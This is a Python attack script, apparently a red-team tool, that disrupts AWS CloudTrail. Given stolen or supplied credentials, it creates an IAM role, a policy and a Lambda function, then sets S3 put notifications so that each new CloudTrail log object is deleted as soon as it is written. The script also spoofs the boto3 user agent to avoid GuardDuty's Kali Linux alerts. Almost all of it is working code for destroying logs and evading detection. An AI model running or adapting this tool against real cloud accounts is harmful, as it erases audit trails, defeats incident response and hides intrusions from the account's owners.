580 lines
20 KiB
Python
Executable File
580 lines
20 KiB
Python
Executable File
#!/usr/bin/python3
|
|
#
|
|
# This script attempts to disrupt CloudTrail by planting a Lambda function that will delete every object created in S3 bucket
|
|
# bound to a trail. As soon as CloudTrail creates a new object in S3 bucket, Lambda will kick in and delete that object.
|
|
# No object, no logs. No logs, no Incident Response :-)
|
|
#
|
|
# One will need to pass AWS credentials to this tool. Also, the account affected should have at least following permissions:
|
|
# - `iam:CreateRole`
|
|
# - `iam:CreatePolicy`
|
|
# - `iam:AttachRolePolicy`
|
|
# - `lambda:CreateFunction`
|
|
# - `lambda:AddPermission`
|
|
# - `s3:PutBucketNotification`
|
|
#
|
|
# These are the changes to be introduced within a specified AWS account:
|
|
# - IAM role will be created, by default with name: `cloudtrail_helper_role`
|
|
# - IAM policy will be created, by default with name: `cloudtrail_helper_policy`
|
|
# - Lambda function will be created, by default with name: `cloudtrail_helper_function`
|
|
# - Put Event notification will be configured on affected CloudTrail S3 buckets.
|
|
#
|
|
# This tool will fail upon first execution with the following exception:
|
|
#
|
|
# ```
|
|
# [-] Could not create a Lambda function: An error occurred (InvalidParameterValueException) when calling the CreateFunction operation:
|
|
# The role defined for the function cannot be assumed by Lambda.
|
|
# ```
|
|
#
|
|
# At the moment I did not find an explanation for that, but running the tool again with the same set of parameters - get the job done.
|
|
#
|
|
# Afterwards, one should see following logs in CloudWatch traces for planted Lambda function - if no `--disrupt` option was specified:
|
|
#
|
|
# ```
|
|
# [*] Following S3 object could be removed: (Bucket=90112981864022885796153088027941100000000000000000000000,
|
|
# Key=cloudtrail/AWSLogs/712800000000/CloudTrail/us-west-2/2019/03/20/712800000000_CloudTrail_us-west-2_20190320T1000Z_oxxxxxxxxxxxxc.json.gz)
|
|
# ```
|
|
#
|
|
# Requirements:
|
|
# - boto3
|
|
# - pytest
|
|
#
|
|
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
|
#
|
|
|
|
|
|
import io
|
|
import sys
|
|
import time
|
|
import json
|
|
import boto3
|
|
import urllib
|
|
import zipfile
|
|
import argparse
|
|
|
|
config = {
|
|
'debug' : False,
|
|
|
|
'region' : '',
|
|
'trail-name' : '',
|
|
'access-key' : '',
|
|
'secret-key' : '',
|
|
'token' : '',
|
|
|
|
'disrupt' : False,
|
|
|
|
'role-name' : '',
|
|
'policy-name' : '',
|
|
'function-name' : '',
|
|
|
|
'statement-id' : 'ID-1',
|
|
}
|
|
|
|
aws_policy_lambda_assume_role = {
|
|
"Version": "2012-10-17",
|
|
"Statement": [
|
|
{
|
|
"Effect": "Allow",
|
|
"Principal": {
|
|
"Service": "lambda.amazonaws.com"
|
|
},
|
|
"Action": "sts:AssumeRole"
|
|
}
|
|
]
|
|
}
|
|
|
|
aws_policy_for_lambda_role = {
|
|
"Version": "2012-10-17",
|
|
"Statement": [
|
|
{
|
|
"Effect": "Allow",
|
|
"Action": [
|
|
"logs:CreateLogGroup",
|
|
"logs:CreateLogStream",
|
|
"logs:PutLogEvents"
|
|
],
|
|
"Resource": "arn:aws:logs:*:*:*"
|
|
},
|
|
{
|
|
"Effect": "Allow",
|
|
"Action": [
|
|
"s3:GetObject",
|
|
"s3:PutObject",
|
|
"s3:DeleteObject",
|
|
"s3:DeleteObjectVersion"
|
|
],
|
|
"Resource": [
|
|
"arn:aws:s3:::*"
|
|
]
|
|
}
|
|
]
|
|
}
|
|
|
|
|
|
aws_s3_bucket_notification_configuration = {
|
|
"LambdaFunctionConfigurations": [
|
|
{
|
|
"LambdaFunctionArn": "<TO-BE-CREATED-LATER>",
|
|
"Id": config['statement-id'],
|
|
"Events": [
|
|
"s3:ObjectCreated:*"
|
|
]
|
|
}
|
|
]
|
|
}
|
|
|
|
disruption_lambda_code_do_harm = '''
|
|
response = s3.delete_object(Bucket=bucket, Key=key)
|
|
'''
|
|
|
|
disruption_lambda_code_no_harm = '''
|
|
print("[*] Following S3 object could be removed: (Bucket={}, Key={})".format(bucket, key))
|
|
'''
|
|
|
|
disruption_lambda_code = '''
|
|
import json
|
|
import urllib
|
|
import boto3
|
|
|
|
s3 = boto3.client('s3')
|
|
|
|
def lambda_handler(event, context):
|
|
try:
|
|
bucket = event['Records'][0]['s3']['bucket']['name']
|
|
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
|
|
{code}
|
|
except Exception as e:
|
|
print('S3 delete object failed: ' + str(e))
|
|
raise e
|
|
'''
|
|
|
|
|
|
class Logger:
|
|
@staticmethod
|
|
def _out(x):
|
|
sys.stdout.write(x + '\n')
|
|
|
|
@staticmethod
|
|
def out(x):
|
|
Logger._out('[>] ' + x)
|
|
|
|
@staticmethod
|
|
def info(x):
|
|
Logger._out('[.] ' + x)
|
|
|
|
@staticmethod
|
|
def fatal(x):
|
|
sys.stdout.write('[!] ' + x + '\n')
|
|
sys.exit(1)
|
|
|
|
@staticmethod
|
|
def fail(x):
|
|
Logger._out('[-] ' + x)
|
|
|
|
@staticmethod
|
|
def ok(x):
|
|
Logger._out('[+] ' + x)
|
|
|
|
@staticmethod
|
|
def dbg(x):
|
|
if config['debug']:
|
|
sys.stdout.write(f'[dbg] {x}\n')
|
|
|
|
class CloudTrailDisruptor:
|
|
session = None
|
|
def __init__(self, region, access_key, secret_key, token = ''):
|
|
self.region = region
|
|
self.access_key = access_key
|
|
self.secret_key = secret_key
|
|
self.token = token
|
|
self.session = None
|
|
self.authenticate()
|
|
|
|
def authenticate(self):
|
|
try:
|
|
self.session = None
|
|
self.session = boto3.Session(
|
|
aws_access_key_id = self.access_key,
|
|
aws_secret_access_key = self.secret_key,
|
|
aws_session_token = self.token,
|
|
region_name = self.region
|
|
)
|
|
except Exception as e:
|
|
Logger.fail(f'Could obtain AWS session: {e}')
|
|
raise e
|
|
|
|
def get_session(self):
|
|
return self.session
|
|
|
|
def get_account_id(self):
|
|
try:
|
|
return self.session.client('sts').get_caller_identity()['Account']
|
|
except Exception as e:
|
|
Logger.fatal(f'Could not Get Caller\'s identity: {e}')
|
|
|
|
def find_trails_to_disrupt(self):
|
|
cloudtrail = self.session.client('cloudtrail')
|
|
trails = cloudtrail.describe_trails()
|
|
|
|
disrupt = []
|
|
|
|
for trail in trails['trailList']:
|
|
Logger.dbg(f"Checking whether trail {trail['Name']} is logging.")
|
|
status = cloudtrail.get_trail_status(Name = trail['Name'])
|
|
if status and status['IsLogging']:
|
|
r = 'Yes' if trail['IsMultiRegionTrail'] else 'No'
|
|
Logger.ok(f"Trail {trail['Name']} is actively logging (multi region? {r}).")
|
|
disrupt.append(trail)
|
|
|
|
return disrupt
|
|
|
|
def create_role(self, role_name, role_policy, description = ''):
|
|
iam = self.session.client('iam')
|
|
policy = json.dumps(role_policy)
|
|
|
|
roles = iam.list_roles()
|
|
for role in roles['Roles']:
|
|
if role['RoleName'] == role_name:
|
|
Logger.fail(f'Role with name: {role_name} already exists.')
|
|
Logger.dbg("Returning: {}".format(str({'Role':role})))
|
|
return {'Role' : role}
|
|
|
|
Logger.info(f'Creating a role named: {role_name}')
|
|
Logger.dbg(f'Policy to be used in role creation:\n{policy}')
|
|
|
|
out = {}
|
|
try:
|
|
out = iam.create_role(
|
|
RoleName = role_name,
|
|
AssumeRolePolicyDocument = policy,
|
|
Description = description
|
|
)
|
|
except Exception as e:
|
|
Logger.fatal(f'Could not create a role for Lambda: {e}')
|
|
# Due to fatal, code will not reach this path
|
|
return False
|
|
|
|
Logger.ok(f'Role created.')
|
|
Logger.dbg(f'Returned: {out}')
|
|
|
|
return out
|
|
|
|
def create_role_policy(self, policy_name, policy_document, description = ''):
|
|
iam = self.session.client('iam')
|
|
policy = json.dumps(policy_document)
|
|
|
|
policies = iam.list_policies(Scope = 'All')
|
|
for p in policies['Policies']:
|
|
if p['PolicyName'] == policy_name:
|
|
Logger.fail(f'Policy with name: {policy_name} already exists.')
|
|
return {'Policy' : p}
|
|
|
|
Logger.info(f'Creating a policy named: {policy_name}')
|
|
Logger.dbg(f'Policy to be used in role creation:\n{policy}')
|
|
|
|
out = {}
|
|
try:
|
|
out = iam.create_policy(
|
|
PolicyName = policy_name,
|
|
PolicyDocument = policy,
|
|
Description = description
|
|
)
|
|
except Exception as e:
|
|
Logger.fatal(f'Could not create a policy for that lambda role: {e}')
|
|
# Due to fatal, code will not reach this path
|
|
return False
|
|
|
|
Logger.ok(f'Policy created.')
|
|
Logger.dbg(f'Returned: {out}')
|
|
|
|
return out
|
|
|
|
def attach_role_policy(self, role_name, policy_arn):
|
|
Logger.info(f'Attaching policy ({policy_arn}) to the role {role_name}')
|
|
|
|
iam = self.session.client('iam')
|
|
|
|
attached = iam.list_attached_role_policies(RoleName = role_name)
|
|
for policy in attached['AttachedPolicies']:
|
|
if policy['PolicyArn'] == policy_arn:
|
|
Logger.fail(f'Policy is already attached.')
|
|
return True
|
|
|
|
try:
|
|
iam.attach_role_policy(
|
|
RoleName = role_name,
|
|
PolicyArn = policy_arn
|
|
)
|
|
except Exception as e:
|
|
Logger.fatal(f'Could not create a policy for that lambda role: {e}')
|
|
# Due to fatal, code will not reach this path
|
|
return False
|
|
|
|
Logger.ok(f'Policy attached.')
|
|
return True
|
|
|
|
# Source: https://stackoverflow.com/a/51899017
|
|
@staticmethod
|
|
def create_in_mem_zip_archive(file_map, files):
|
|
buf = io.BytesIO()
|
|
Logger.dbg("Building zip file: " + str(files))
|
|
with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zfh:
|
|
for file_name in files:
|
|
file_blob = file_map.get(file_name)
|
|
if file_blob is None:
|
|
Logger.fail("Missing file {} from files".format(file_name))
|
|
continue
|
|
try:
|
|
info = zipfile.ZipInfo(file_name)
|
|
info.date_time = time.localtime()
|
|
info.compress_type = zipfile.ZIP_DEFLATED
|
|
info.external_attr = 0o777 << 16 # give full access
|
|
zfh.writestr(info, file_blob)
|
|
except Exception as ex:
|
|
raise ex
|
|
Logger.fail("Error reading file: " + file_name + ", error: " + ex.message)
|
|
buf.seek(0)
|
|
return buf.read()
|
|
|
|
|
|
def create_lambda_function(self, function_name, role_name, code, description = ''):
|
|
awslambda = self.session.client('lambda')
|
|
lambdacode = CloudTrailDisruptor.create_in_mem_zip_archive(
|
|
{'lambda_function.py': code},
|
|
{'lambda_function.py'}
|
|
)
|
|
|
|
funcs = awslambda.list_functions()
|
|
for f in funcs['Functions']:
|
|
if f['FunctionName'] == function_name:
|
|
Logger.fail(f'Function with name: {function_name} already exists. Removing old one.')
|
|
awslambda.delete_function(FunctionName = function_name)
|
|
Logger.ok('Old function was removed.')
|
|
break
|
|
|
|
Logger.info(f'Creating a lambda function named: {function_name} on Role: {role_name}')
|
|
Logger.dbg(f'Lambda code to be used:\n{code}')
|
|
|
|
out = {}
|
|
try:
|
|
out = awslambda.create_function(
|
|
FunctionName = function_name,
|
|
Runtime = 'python2.7',
|
|
Role = role_name,
|
|
Handler = 'lambda_function.lambda_handler',
|
|
Code = {
|
|
'ZipFile' : lambdacode,
|
|
},
|
|
Description = description,
|
|
Timeout = 30,
|
|
Publish = True
|
|
)
|
|
Logger.ok(f'Function created.')
|
|
except Exception as e:
|
|
Logger.fail(f'Could not create a Lambda function: {e}')
|
|
if 'The role defined for the function cannot be assumed by Lambda.' in str(e):
|
|
Logger.info('====> This is a known bug (?). Running again this program should get the job done.')
|
|
|
|
Logger.dbg(f'Returned: {out}')
|
|
return out
|
|
|
|
def permit_function_invoke(self, function_name, statement_id, bucket_arn):
|
|
awslambda = self.session.client('lambda')
|
|
|
|
Logger.info(f'Adding invoke permission to func: {function_name} on S3 bucket: {bucket_arn}')
|
|
try:
|
|
out = awslambda.add_permission(
|
|
FunctionName = function_name,
|
|
Action = 'lambda:InvokeFunction',
|
|
Principal = 's3.amazonaws.com',
|
|
SourceArn = bucket_arn,
|
|
StatementId = statement_id
|
|
)
|
|
except Exception as e:
|
|
Logger.fail(f'Could not add permission to the Lambda: {e}. Continuing anyway.')
|
|
|
|
return out
|
|
|
|
def set_s3_put_notification(self, bucket, notification_configuration):
|
|
s3 = self.session.client('s3')
|
|
|
|
arn = notification_configuration['LambdaFunctionConfigurations'][0]['LambdaFunctionArn']
|
|
conf = s3.get_bucket_notification_configuration(Bucket = bucket)
|
|
if 'LambdaFunctionConfigurations' in conf.keys():
|
|
for configuration in conf['LambdaFunctionConfigurations']:
|
|
if configuration['Id'] == config['statement-id'] and arn == configuration['LambdaFunctionArn']:
|
|
Logger.fail('S3 Put notification already configured for that function on that S3 bucket.')
|
|
return True
|
|
|
|
Logger.info(f'Putting a bucket notification configuration to {bucket}, ARN: {arn}')
|
|
Logger.dbg(f'Notification used :\n{notification_configuration}')
|
|
|
|
out = {}
|
|
try:
|
|
out = s3.put_bucket_notification_configuration(
|
|
Bucket = bucket,
|
|
NotificationConfiguration = notification_configuration
|
|
)
|
|
except Exception as e:
|
|
Logger.fail(f'Could not put bucket notification configuration: {e}')
|
|
return False
|
|
|
|
return True
|
|
|
|
|
|
def parseOptions(argv):
|
|
global config
|
|
|
|
print('''
|
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
|
''')
|
|
|
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')
|
|
parser._action_groups.pop()
|
|
required = parser.add_argument_group('required arguments')
|
|
optional = parser.add_argument_group('optional arguments')
|
|
|
|
required.add_argument('region', type=str, help = 'AWS region to use.')
|
|
|
|
required.add_argument('--access-key', type=str, help = 'AWS Access Key ID')
|
|
required.add_argument('--secret-key', type=str, help = 'AWS Access Key ID')
|
|
optional.add_argument('--token', type=str, help = 'AWS temporary session token')
|
|
|
|
optional.add_argument('trail_name', type=str, default = 'all', nargs='?', help = 'CloudTrail name that you want to disrupt. If not specified, will disrupt every actively logging trail.')
|
|
|
|
optional.add_argument('--disrupt', action='store_true', default = False, help = 'By default, this tool will install Lambda that is only logging that it could remove S3 objects. By using this switch, there is going to be Lambda introduced that actually deletes objects.')
|
|
|
|
optional.add_argument('--role-name', type=str, default='cloudtrail_helper_role', help = 'name for AWS Lambda role')
|
|
optional.add_argument('--policy-name', type=str, default='cloudtrail_helper_policy', help = 'name for a policy for that Lambda role')
|
|
optional.add_argument('--function-name', type=str, default='cloudtrail_helper_function', help = 'name for AWS Lambda function')
|
|
|
|
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
|
|
|
|
args = parser.parse_args()
|
|
|
|
config['debug'] = args.debug
|
|
config['access-key'] = args.access_key
|
|
config['secret-key'] = args.secret_key
|
|
config['token'] = args.token
|
|
|
|
config['region'] = args.region
|
|
config['disrupt'] = args.disrupt
|
|
config['trail-name'] = args.trail_name
|
|
config['role-name'] = args.role_name
|
|
config['policy-name'] = args.policy_name
|
|
config['function-name'] = args.function_name
|
|
|
|
if not args.access_key or not args.secret_key:
|
|
Logger.fatal("Please provide AWS Access Key, Secret Key and optionally Session Token")
|
|
|
|
return args
|
|
|
|
def monkeyPatchBotocoreUserAgent():
|
|
'''
|
|
This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
|
|
Source:
|
|
https://www.thesubtlety.com/post/patching-boto3-useragent/
|
|
|
|
'''
|
|
import sys
|
|
import boto3
|
|
import botocore
|
|
|
|
try:
|
|
from _pytest.monkeypatch import MonkeyPatch
|
|
except (ImportError, ModuleNotFoundError) as e:
|
|
print('[!] Please install "pytest" first: pip3 install pytest')
|
|
print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
|
|
sys.exit(0)
|
|
|
|
monkeypatch = MonkeyPatch()
|
|
def my_user_agent(self):
|
|
return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
|
|
|
|
monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
|
|
|
|
def main(argv):
|
|
opts = parseOptions(argv)
|
|
if not opts:
|
|
Logger.err('Options parsing failed.')
|
|
return False
|
|
|
|
monkeyPatchBotocoreUserAgent()
|
|
|
|
dis = CloudTrailDisruptor(
|
|
config['region'],
|
|
config['access-key'],
|
|
config['secret-key'],
|
|
config['token']
|
|
)
|
|
|
|
account_id = dis.get_account_id()
|
|
Logger.info(f'Will be working on Account ID: {account_id}')
|
|
|
|
Logger.info('Step 1: Determine trail to disrupt')
|
|
trails = []
|
|
if config['trail-name'] and config['trail-name'] != 'all':
|
|
Logger.ok(f"Will use trail specified by user: {config['trail-name']}")
|
|
trail_name = config['trail-name']
|
|
ct = dis.get_session().client('cloudtrail')
|
|
t = ct.describe_trails(trailNameList=[trail_name,])
|
|
trails.append(t[0])
|
|
else:
|
|
trails.extend(dis.find_trails_to_disrupt())
|
|
|
|
Logger.info('Trails intended to be disrupted:')
|
|
for trail in trails:
|
|
Logger._out(f'\t- {trail["Name"]}')
|
|
|
|
Logger._out('')
|
|
Logger.info('Step 2: Create a role to be assumed by planted Lambda')
|
|
created_role = dis.create_role(config['role-name'], aws_policy_lambda_assume_role)
|
|
if not created_role:
|
|
Logger.fatal('Could not create a lambda role.')
|
|
|
|
Logger.info('Step 3: Create a policy for that role')
|
|
policy = dis.create_role_policy(config['policy-name'], aws_policy_for_lambda_role)
|
|
if not policy:
|
|
Logger.fatal('Could not create a policy for lambda role.')
|
|
|
|
Logger.info('Step 4: Attach policy to the role')
|
|
if not dis.attach_role_policy(config['role-name'], policy['Policy']['Arn']):
|
|
Logger.fatal('Could not attach a policy to the lambda role.')
|
|
|
|
Logger.info('Step 5: Create Lambda function')
|
|
code = ''
|
|
|
|
if config['disrupt']:
|
|
code = disruption_lambda_code.format(code = disruption_lambda_code_do_harm)
|
|
Logger.info('\tUSING DISRUPTIVE LAMBDA!')
|
|
else:
|
|
code = disruption_lambda_code.format(code = disruption_lambda_code_no_harm)
|
|
Logger.info('\tUsing non-disruptive lambda.')
|
|
|
|
if not dis.create_lambda_function(config['function-name'], created_role['Role']['Arn'], code):
|
|
Logger.fatal('Could not create a Lambda function.')
|
|
|
|
Logger.info('Step 6: Permit function to be invoked on all trails')
|
|
for trail in trails:
|
|
bucket_arn = f"arn:aws:s3:::{trail['S3BucketName']}"
|
|
dis.permit_function_invoke(config['function-name'], config['statement-id'], bucket_arn)
|
|
|
|
Logger.info('Step 7: Configure trail bucket\'s put notification')
|
|
global aws_s3_bucket_notification_configuration
|
|
|
|
regions = [config['region'], ]
|
|
for region in regions:
|
|
arn = f"arn:aws:lambda:{region}:{account_id}:function:{config['function-name']}"
|
|
aws_s3_bucket_notification_configuration['LambdaFunctionConfigurations'][0]['LambdaFunctionArn'] = arn
|
|
for trail in trails:
|
|
dis.set_s3_put_notification(
|
|
trail['S3BucketName'],
|
|
aws_s3_bucket_notification_configuration
|
|
)
|
|
|
|
print("[+] Installed CloudTrail's S3 bucket disruption Lambda.")
|
|
|
|
if __name__ == '__main__':
|
|
main(sys.argv)
|